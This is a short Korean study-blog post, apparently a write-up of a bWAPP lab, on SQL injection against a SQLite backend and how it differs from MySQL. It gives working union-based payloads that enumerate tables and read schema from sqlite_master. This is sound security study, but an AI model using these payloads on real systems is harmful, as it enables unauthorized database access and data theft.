작은따옴표를 입력했더니 mysql와는 다른 오류 문구를 보여줬다.

mysql에서는 주석처리를 #으로 하지만 sqlite에서는 -- 하이폰 두 개를 입력한다.

칼럼의 개수도 확인한다.

0'union select 1,tbl_name,3,4,5,6 from sqlite_master --

테이블을 검색하는 것도 mysql과 약간차이가 난다.

table_name -> tbl_name , information_schema -> sqlite_master

0'union select 1,sql,3,4,5,6 from sqlite_master where tbl_name="movies"--

sqlite에서는 sql 필드의 내용을 통해 컬럼 이름을 확인해야 한다.

 

미디엄과 하이 레벨에서는 작은따옴표 한 개를 두 개로 치환하고 있다.

저작자표시

'공부 > bWAPP' 카테고리의 다른 글

SQL Injection - Stored (SQLite)  (0) 2020.03.02
SQL Injection - Stored (Blog)  (0) 2020.02.29
SQL Injection (Login Form/User)  (0) 2020.02.26
SQL Injection (Login Form/Hero)  (0) 2020.02.26
SQL Injection (AJAX/JSON/jQuery)  (0) 2020.02.25

+ Recent posts

티스토리툴바